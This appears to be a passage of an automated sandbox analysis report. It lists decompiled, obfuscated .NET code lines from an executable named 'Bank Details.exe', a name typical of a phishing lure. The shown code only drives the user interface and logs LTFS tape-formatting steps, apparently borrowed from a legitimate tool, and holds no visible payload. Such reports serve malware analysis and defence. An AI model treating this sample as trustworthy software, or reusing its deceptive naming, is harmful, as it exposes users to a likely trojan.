                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox1, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_CurDrive, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" unthreaded"));}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.ConfTapeDrive + " Barcode = " + CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_barcode;}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1]{new n8(qb.s6T)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{//IL_002e: Unknown result type (might be due to invalid IL or missing references)//IL_0034: Expected O, but got Unknown//IL_008c: Unknown result type (might be due to invalid IL or missing references)//IL_0093: Expected O, but got Unknown//IL_00f0: Unknown result type (might be due to invalid IL or missing references)//IL_00f7: Expected O, but got Unknown//IL_0157: Unknown result type (might be due to invalid IL or missing references)//IL_015e: Expected O, but got Unknownforeach (Control item in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.Panel1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val = item;val.Enabled = true;}foreach (Control item2 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.Panel2, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val2 = item2;val2.Enabled = true;}foreach (Control item3 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.TabControl1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val3 = item3;val3.Enabled = true;}foreach (Control item4 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.TabPage1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val4 = item4;val4.Enabled = true;}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { "Start format ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Initializing tape.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(CS_0024_003C_003E8__locals0._0024VB_0024Local_ModeData), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Vendor=OPEN.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Application name = LTFSCopyGUI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Application Version={((ApplicationBase)p4.Application).Info.Version.ToString(3)}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: TextLabel= .." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Localization Identifier = 0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Barcode={_0024VB_0024Local_barcode}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Format Version=2.4.0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Block size.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Locate to data partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Locate to index partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Written time={CS_0024_003C_003E8__locals0._0024VB_0024Local_CurrentTime}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: VCI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Format finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
